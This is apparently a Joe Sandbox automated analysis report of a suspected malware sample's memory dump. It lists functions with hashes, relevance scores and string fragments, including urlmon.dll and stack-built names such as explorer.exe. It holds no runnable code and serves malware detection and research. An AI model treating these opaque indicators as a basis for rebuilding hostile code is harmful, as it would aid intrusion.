Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: _$"A$"R$#$&x$0c$2.$4$6&$?W$@ $@m$D$E%$J6$S$X$XE$[>$[>$[P$\7$_$i$q$v$wn$xl${$X$]
API String ID: 0-822328373
Opcode ID: 5c8907fcd318398fe434257060d111f319ca62578bd2e244ed039c69909d826c
Instruction ID: 82c7cc4425a75871836ecd99ce5572aaf1df42985d5f93b38afa094f1d4e3995
Opcode Fuzzy Hash: 5c8907fcd318398fe434257060d111f319ca62578bd2e244ed039c69909d826c
Instruction Fuzzy Hash: 3C62DFB0D1522DCBEB29DF45C999BDDBBB1BB48308F1085D9C2196B291C7B95AC8CF40

Function 03211DFC Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

s, xrefs: 03211E83
O, xrefs: 03211E8A
\, xrefs: 03211E98
6, xrefs: 03211E91
S, xrefs: 03211E7C

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 601b1630c99331072331901222c07396653d7a3f6576e53904ec2ce57a436b7d
Instruction ID: bee64736e6668d2be9570534e636c7bc06cbb3780655efa9da879fc8c11cac39
Opcode Fuzzy Hash: 601b1630c99331072331901222c07396653d7a3f6576e53904ec2ce57a436b7d
Instruction Fuzzy Hash: 10519672D24218AADB10DB94DD84BFFF7B8EF54310F044299E9085A141E7B16AA89BE1

Function 0322046C Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

aR!, xrefs: 03220472
cp, xrefs: 032204C5

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: aR!$cp
API String ID: 0-3937782153
Opcode ID: 33d7ce1647a01ce6b54831d9d3d9c52445c953aeb8b9df36a2720fa8c97072d9
Instruction ID: 409ab150767ae4312bc2b8c0a3fad3d9ee47e2a72ffd3f36675b4e6a6e561cce
Opcode Fuzzy Hash: 33d7ce1647a01ce6b54831d9d3d9c52445c953aeb8b9df36a2720fa8c97072d9
Instruction Fuzzy Hash: 0C1100B6D11218AF9B00DFA9D8409EEB7F9FF4C210F04815AE909E7200E7719A04CBE1

Function 0321F09C Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

&w, xrefs: 0321F0DB

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: &w
API String ID: 0-1281783108
Opcode ID: a2814ac6253cca2df13920b4f86e4d3004c38e2332ee6ce54d301efa40fb08a0
Instruction ID: 57e111a46b3effc305f5d95e49d80703c17d0c1000272cf05a5fa15b3ce628ba
Opcode Fuzzy Hash: a2814ac6253cca2df13920b4f86e4d3004c38e2332ee6ce54d301efa40fb08a0
Instruction Fuzzy Hash: 1801E9B6C15219AFCB40DFE8D9419EEBBF8BB18200F14826AD919F7200F7705A048FE1

Function 031FD90F Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40c44dfad8925aad656ffa5b5de893cd204b5cf3c64777f593037e817477be
Instruction ID: 8f033d6b6b72e5f478ba2d0831c194d6340a1115561923f24a2a4a3cb9e59fd7
Opcode Fuzzy Hash: 3f40c44dfad8925aad656ffa5b5de893cd204b5cf3c64777f593037e817477be
Instruction Fuzzy Hash: 09410AB1D11229AFDB00CF99DC81AEEBBBCFF49710F10415AFA14E6240E3B19641CBA4

Function 0322270C Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe3830a18f6211a58943ae8d9495a0ce636223d0b97e22ccf9f6f093fff0190
Instruction ID: 1fbd32e6131eec0bb8448aca2e5ae18e69a84c0de23f5936dea0d7ee01b6fb32
Opcode Fuzzy Hash: efe3830a18f6211a58943ae8d9495a0ce636223d0b97e22ccf9f6f093fff0190
Instruction Fuzzy Hash: 283109B5A00708AFDB14DF99CC41EDFBBB8EF89710F108609F918AB244D770A951CBA1

Function 0322301C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0923b7ec1641a3b9e833591411169e8b621bf31edc11608b2656222738dd85
Instruction ID: 3ca6f01f8f4293e860bdd0fd1290fa364db1ac1bd3a83a12fae26a44bf7c48c6
Opcode Fuzzy Hash: 5a0923b7ec1641a3b9e833591411169e8b621bf31edc11608b2656222738dd85
Instruction Fuzzy Hash: D8211BB5A00709AFDB14DF98CC41EEF7BB8EF89710F108509F918AB240D770A951CBA5

Function 03211C3C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121fca320653fed34803580ebcff244db246ab0bfb2f6647c1b9e350b5ef3bc5
Instruction ID: dbd50776da49ed0b175995dee451e81bef58292f2fb56c20051222040443dde9
Opcode Fuzzy Hash: 121fca320653fed34803580ebcff244db246ab0bfb2f6647c1b9e350b5ef3bc5
Instruction Fuzzy Hash: 3411A0B6390315BAF720EA158C43FAB775C9B85B10F244004FB08AE2C0D6F5F95146B8

Function 032223AC Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a33c02be3b6c7bbdb297d235173cb5751ae9d48d348a0568fd1c5be8c4c602
Instruction ID: 9b7827b50d2d90fa0da9fe6e5a5a60e8cbf89f85cc4dfd198c1aeb3c53860a19
Opcode Fuzzy Hash: 99a33c02be3b6c7bbdb297d235173cb5751ae9d48d348a0568fd1c5be8c4c602
Instruction Fuzzy Hash: 06114F75614318BFD720EB68CC41FAF77A8EB89710F108949FA185B280E7B06951C7A5

Function 0321F12C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c4cb978bf11bc8444d35bf24d1a386170a55eb6437fe108f302d49a3532e56
Instruction ID: 561d690afc3ad4dd7e9dc3e0bd3788e16b42c0965022cd884fcfe9b01d532e31
Opcode Fuzzy Hash: d0c4cb978bf11bc8444d35bf24d1a386170a55eb6437fe108f302d49a3532e56
Instruction Fuzzy Hash: 022130B6D0121CAFCB00DFA8D9409EFB7F9EF88210F04856AE915E7200E7709A148BE0

Function 0322252C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848b2fed61242966707fe9f6dc703322e1c899f59c7a2aeba66d27ca0276c82b
Instruction ID: 03b7f13b3675cee2e64e71af01620b885bde8dae86b309fbe2cfbb1137e76216
Opcode Fuzzy Hash: 848b2fed61242966707fe9f6dc703322e1c899f59c7a2aeba66d27ca0276c82b
Instruction Fuzzy Hash: CE117F75614318BFD620EB68CC41FAF7BBCDF89610F008509FA585B281E7716951C7A1

Function 0322336C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9430d4237b192487147af20d7dda05c988cec88c93a14eea5518fce71c42fe1
Instruction ID: d33f3b3dfebaae83ce05e8c1c69caa216d37a3c240f8bf9b288b8538d8cfc687
Opcode Fuzzy Hash: b9430d4237b192487147af20d7dda05c988cec88c93a14eea5518fce71c42fe1
Instruction Fuzzy Hash: AF0180B6214608BBCB54DE9DDC80EEB77ADAF8D754F418209BA19A7240D630F8518BA4

Function 031FDA6D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b928a769bbc33197c103463dcac54abac5288930e3fb33c4c56ca19d21df81
Instruction ID: 04ee1fee3eb43442cc0dd063118714be4434d6980a7586ce1d5fab1de4851f30
Opcode Fuzzy Hash: 00b928a769bbc33197c103463dcac54abac5288930e3fb33c4c56ca19d21df81
Instruction Fuzzy Hash: 8BF0A7776142166BD7109A5DFC40B96F79CEB88230F251722FA1C8A251E772D46182A4

Function 0322262C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13bb72735afa4048b637b71b23ac64369b0240a53ecab6f00f513ccc6850163d
Instruction ID: 5604e91bc3ef7845cd204c3b7d072f0004f326ab123ff0484c1ba289237e5ff6
Opcode Fuzzy Hash: 13bb72735afa4048b637b71b23ac64369b0240a53ecab6f00f513ccc6850163d
Instruction Fuzzy Hash: 81F01C76204214BFDB24EE89DC41E9B77ACEFC9750F108409BA18AB241D770B9118BB4

Function 0322329C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction ID: ede59fdf4b88523b0520cb2697e0b6db45ad676321b9bcff8c717b42f4fee6b2
Opcode Fuzzy Hash: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction Fuzzy Hash: A1E09A76204704BFD620EE99DC45F9B37ACEFC9710F004008FA09AB281E770B8108BB8

Function 03211D5C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd380f69e25ad44fda708c3020d554de72344ff8262616012a92947c5b8ee787
Instruction ID: 9eeeb798825bda8db49c961b4d9b0d4544e5dc1b3880735037204ac034b3cc4f
Opcode Fuzzy Hash: fd380f69e25ad44fda708c3020d554de72344ff8262616012a92947c5b8ee787
Instruction Fuzzy Hash: 16F08271815209EBDB14DF64D841BDDBBB8EB04320F1083A9E9259B2C0D63597A08B81

Function 032250DC Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcc11f4e7e243074af7042d69b7e565029f91cb34091bdb73f7a8531787fa93a
Instruction ID: 2bb279f7b4fdd0204d814940e8c20e3077207dfd4bf3be93dbd2db1e91c94e18
Opcode Fuzzy Hash: bcc11f4e7e243074af7042d69b7e565029f91cb34091bdb73f7a8531787fa93a
Instruction Fuzzy Hash: 95E0DF36A2033077D220918A8C06FABFB5CDBC2E20F288064FE089B240E1B0ED4046E4

Function 03211D5B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3820f58c00a55db5aad798b50a08aee30b977eab04fe43e309578268e18dc579
Instruction ID: 7fdfa78a94948191c37a7ceb074dd002a5b09c04bb65ab6bd61e57158e428309
Opcode Fuzzy Hash: 3820f58c00a55db5aad798b50a08aee30b977eab04fe43e309578268e18dc579
Instruction Fuzzy Hash: FFE06D71925108EADF18CB74E881BEDBFB4DB04260F1483AAE919DB280D67697A48B40

Function 03222F8C Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction ID: df9548ee688ee32c051745b888fe89896a23b102b3094c40401f283ecb5d6199
Opcode Fuzzy Hash: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction Fuzzy Hash: 5BE04F362102147BD120FA5ADC00E97B76CEBC5650F004019FA186B541D770BA1187A0

Function 03204A9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6bcee4c35a7c46151948aa971e312cddff5c193afaae81402205d428df2b5f
Instruction ID: 517ae91aaa5f3b6bce97fe81cb6beefeb497fadfcae8c166fd720d8f3c4d3125
Opcode Fuzzy Hash: 3d6bcee4c35a7c46151948aa971e312cddff5c193afaae81402205d428df2b5f
Instruction Fuzzy Hash: E2C08075542122AA8756BB3449008537FE7F7C6650354A126E485DD153D760445CC640

Non-executed Functions

Function 0320DACB Relevance: 51.4, Strings: 41, Instructions: 167COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0320DC84
@@@@, xrefs: 0320DC30
)*+,, xrefs: 0320DBF3
@@@@, xrefs: 0320DC5A
%&'(, xrefs: 0320DBE9
@@@@, xrefs: 0320DCBC
@@@@, xrefs: 0320DC76
@@@@, xrefs: 0320DCE6
@@@@, xrefs: 0320DC22
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 0320DD3F
@@@@, xrefs: 0320DC29
@@@@, xrefs: 0320DC11
!"#$, xrefs: 0320DBDF
-./0, xrefs: 0320DBFD
@@@@, xrefs: 0320DC45
@@@@, xrefs: 0320DC61
@@@@, xrefs: 0320DCC3
@@@@, xrefs: 0320DCD1
@@@@, xrefs: 0320DC7D
@@@@, xrefs: 0320DCED
@@@@, xrefs: 0320DC4C
@@@@, xrefs: 0320DC6F
@@@@, xrefs: 0320DCAE
@@@@, xrefs: 0320DC92
@@@@, xrefs: 0320DCF4
123@, xrefs: 0320DC07
@@@@, xrefs: 0320DCDF
@@@@, xrefs: 0320DC68
@@@@, xrefs: 0320DBC1
@@@@, xrefs: 0320DCD8
@@@@, xrefs: 0320DC8B
@@@@, xrefs: 0320DCA7
@@@@, xrefs: 0320DC99
@@@@, xrefs: 0320DCA0
@@@@, xrefs: 0320DC3E
@@@@, xrefs: 0320DC1B
@@@@, xrefs: 0320DCB5
@@@@, xrefs: 0320DC53
@@@@, xrefs: 0320DCCA
@@@@, xrefs: 0320DC37
@@@@@@@@, xrefs: 0320DD0B

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
API String ID: 0-3248090998
Opcode ID: 00453b763d077ee02ead7a7fa4bb3af38d857b7c10d1b34b96ba0bda99085f4f
Instruction ID: 6629d207b4bbedbd204ebc06f3491b7a1d48f9c02605cd4d4481499970d38ef6
Opcode Fuzzy Hash: 00453b763d077ee02ead7a7fa4bb3af38d857b7c10d1b34b96ba0bda99085f4f
Instruction Fuzzy Hash: BB9111F08052998ECB118F5995603DFBF71BB95204F1581E9C6AA7B243C3BE4E85DF50

Function 0321C60C Relevance: 34.0, Strings: 27, Instructions: 264COMMON

Download Yara Rule

Strings

}, xrefs: 0321C690
w, xrefs: 0321C6C6
%, xrefs: 0321C7F2
5, xrefs: 0321C6B8
$, xrefs: 0321C6A4
i, xrefs: 0321C8AE
F, xrefs: 0321C6D4
H, xrefs: 0321C6DB
), xrefs: 0321C6AE
Q, xrefs: 0321C6E2
urlmon.dll, xrefs: 0321C84E, 0321C851
s, xrefs: 0321C69A
F, xrefs: 0321C6E9
T, xrefs: 0321C6F7
g, xrefs: 0321C67C
u, xrefs: 0321C686
h, xrefs: 0321C636
), xrefs: 0321C654
B, xrefs: 0321C721
J, xrefs: 0321C728
$, xrefs: 0321C668
>, xrefs: 0321C64A
}, xrefs: 0321C672
E, xrefs: 0321C6CD
., xrefs: 0321C8A7
m, xrefs: 0321C6BF
v, xrefs: 0321C640

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1002149817
Opcode ID: a164f068684bac3566e368d05f2fce9f9fbe87d2bb1d637e9cde92a0c2f5a42a
Instruction ID: 6e36a9566a891eda4aa76f53544086ccbb4e97d85cfeb0062c48819c3f9c598b
Opcode Fuzzy Hash: a164f068684bac3566e368d05f2fce9f9fbe87d2bb1d637e9cde92a0c2f5a42a
Instruction Fuzzy Hash: 17C130B5C11328AADB61DFA4CC44BEEBBB8AF09704F1041D9D50CBB241E7B54A88CF95

Function 03214C3C Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

i, xrefs: 03214C9D
F, xrefs: 03214CE3
s, xrefs: 03214CF1
, xrefs: 03214C96
o, xrefs: 03214CCE
m, xrefs: 03214CDC
r, xrefs: 03214CD5
P, xrefs: 03214CC7
o, xrefs: 03214CAB
e, xrefs: 03214CA4
l, xrefs: 03214CEA
x, xrefs: 03214C77
., xrefs: 03214C6D

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 472d1ad08a937ef8a78319225e3f991c0c9fc08f3549dc85284bf3f9280a9808
Instruction ID: 23747c397aaf1e19dee666412623444234f14494d95d59b76c4a0c53ec0e7dbf
Opcode Fuzzy Hash: 472d1ad08a937ef8a78319225e3f991c0c9fc08f3549dc85284bf3f9280a9808
Instruction Fuzzy Hash: 707112B5D10328BADB61DBA4CC40FDEB77CBF18700F108699E519AA141EBB55788CF91

Function 03214C39 Relevance: 16.4, Strings: 13, Instructions: 175COMMON

Download Yara Rule

Strings

i, xrefs: 03214C9D
F, xrefs: 03214CE3
s, xrefs: 03214CF1
, xrefs: 03214C96
o, xrefs: 03214CCE
m, xrefs: 03214CDC
r, xrefs: 03214CD5
P, xrefs: 03214CC7
o, xrefs: 03214CAB
e, xrefs: 03214CA4
l, xrefs: 03214CEA
x, xrefs: 03214C77
., xrefs: 03214C6D

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 886fe23e888df78c71cca987ad6c392b41bc19ebd26c2436b620a2f6de2e45da
Instruction ID: e36f40b3e39e4e98622aed873a75c1291a58ecf06bff3871d524d0ab0996db1f
Opcode Fuzzy Hash: 886fe23e888df78c71cca987ad6c392b41bc19ebd26c2436b620a2f6de2e45da
Instruction Fuzzy Hash: 986113B5C10328BADB61DFA4CC40FDEB778BF08700F108699E519AA141EBB55788CF91

Function 03208823 Relevance: 13.8, Strings: 11, Instructions: 85COMMON

Download Yara Rule

Strings

r, xrefs: 0320886E
e, xrefs: 0320887C
D, xrefs: 032088B2
e, xrefs: 03208883
l, xrefs: 03208867
w, xrefs: 032088B9
r, xrefs: 03208875
\, xrefs: 03208859
x, xrefs: 03208860
i, xrefs: 032088C7
n, xrefs: 032088C0

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: e8a2106e7f2422034d6435c3fd98ea88e45a1d60d1d0fc3de4e0a2b6ddad2635
Instruction ID: eef05961ea1900f9c9000026c46aafe8fab5646808245668f56cf1f014ebfd01
Opcode Fuzzy Hash: e8a2106e7f2422034d6435c3fd98ea88e45a1d60d1d0fc3de4e0a2b6ddad2635
Instruction Fuzzy Hash: 3F3161B5D51318AEEF50DFA4DC44BEEBBB9BF08704F10815CE608BA180DBB516488FA5

Function 0320FCE7 Relevance: 10.1, Strings: 8, Instructions: 132COMMON

Download Yara Rule

Strings

e, xrefs: 0320FE01
r, xrefs: 0320FDE9
P, xrefs: 0320FDD5
m, xrefs: 0320FDF3
x, xrefs: 0320FD25
i, xrefs: 0320FDFA
o, xrefs: 0320FDDF
., xrefs: 0320FD1E

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: fc7d895fd1433f3e32eb3cd85ea0f45b8cb9c4ed06e27f79afb4787ec6afd75c
Instruction ID: 608b0348c848a05fcebf065a8a4095ec8866ef10cef42cba1580fce18e9af9a0
Opcode Fuzzy Hash: fc7d895fd1433f3e32eb3cd85ea0f45b8cb9c4ed06e27f79afb4787ec6afd75c
Instruction Fuzzy Hash: 4F4147B5920324B6DB21EBA0DC40FDEB77CAF55700F10C599A509AB181EAF557C88FE1

Function 032010DC Relevance: 10.0, Strings: 8, Instructions: 43COMMON

Download Yara Rule

Strings

Q, xrefs: 03201106
x, xrefs: 03201116
p, xrefs: 032010FA
_, xrefs: 0320112E
a, xrefs: 03201122
~, xrefs: 0320110E
r, xrefs: 032010FE
i, xrefs: 0320110A

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: Q$_$a$i$p$r$x$~
API String ID: 0-2600788100
Opcode ID: 71e40dbebad8abd6d8ed48dc28362d1637c7450b474e4da318638145f65d9da6
Instruction ID: dc208369bcebd1a5ab7f0106b36ec57737b76456be7b87293d886b62e0ec4519
Opcode Fuzzy Hash: 71e40dbebad8abd6d8ed48dc28362d1637c7450b474e4da318638145f65d9da6
Instruction Fuzzy Hash: 4A11CC10D087CAD9DB12C6BC84086AEBF715B13224F0883D9D4E56B2D3C2B95356C7A6

Function 0321CE5C Relevance: 8.9, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

c, xrefs: 0321CECC
L, xrefs: 0321CEC5
a, xrefs: 0321CEE1
\, xrefs: 0321CF21
l, xrefs: 0321CED3
S, xrefs: 0321CEDA
e, xrefs: 0321CEE8

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: 9557e7b0da23fcb4b9f6ead5e1455541201f8236f14409c3d75c5c5bcdf0b418
Instruction ID: 5f3ba7f5fee396761e84bd4f1d2fa5e7595df7fe8b66a6317edce4ab92a6bcc0
Opcode Fuzzy Hash: 9557e7b0da23fcb4b9f6ead5e1455541201f8236f14409c3d75c5c5bcdf0b418
Instruction Fuzzy Hash: C64163B6C24228BACF10DFA4DC84BEEF7F8BF49700F05815AD90DAB144E77156858B91

Function 032149F1 Relevance: 7.7, Strings: 6, Instructions: 177COMMON

Download Yara Rule

Strings

F, xrefs: 03214A51
x, xrefs: 03214A66
f, xrefs: 03214A5F
P, xrefs: 03214A35
r, xrefs: 03214A58
T, xrefs: 03214A3C

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: 71b5125bdeeeead6733fc72ebfb623c7d2fa63c067bfa272a9bb46e25429ba6a
Instruction ID: 91b38cdbf4f971a82e740427f11d1d81cdfd88afc4a827d8ac7370bfa30bb0b8
Opcode Fuzzy Hash: 71b5125bdeeeead6733fc72ebfb623c7d2fa63c067bfa272a9bb46e25429ba6a
Instruction Fuzzy Hash: 185133B192031AAAE730EF66CD44BABF7F8EF05704F04411DE54C5A180E7B4A6D4CB95

Function 032140FF Relevance: 6.4, Strings: 5, Instructions: 198COMMON

Download Yara Rule

Strings

i, xrefs: 03214147
, xrefs: 03214132
u, xrefs: 03214139
